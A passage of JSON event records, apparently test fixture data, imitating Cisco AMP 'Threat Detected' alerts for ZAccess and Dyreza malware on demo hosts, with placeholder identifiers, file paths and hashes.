7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":612000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252764","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255919035252763","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":846000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215109","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":839000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215107","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":790000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215108","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab-temp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab-temp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jar_cache4855455380559478946.tmp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\jar_cache4855455380559478946.tmp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255906150351000,"timestamp":1610705118,"timestamp_nanoseconds":24000000,"date":"2021-01-15T10:05:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255906150350874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":715000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084315","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084314","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":677000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084313","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":501000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364373045149720","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1089625888-3054005746-3039903294-1000\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":4016,"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":441000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149719","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":149000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182417","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149717","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149716","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182419","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":923000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182418","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":740000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 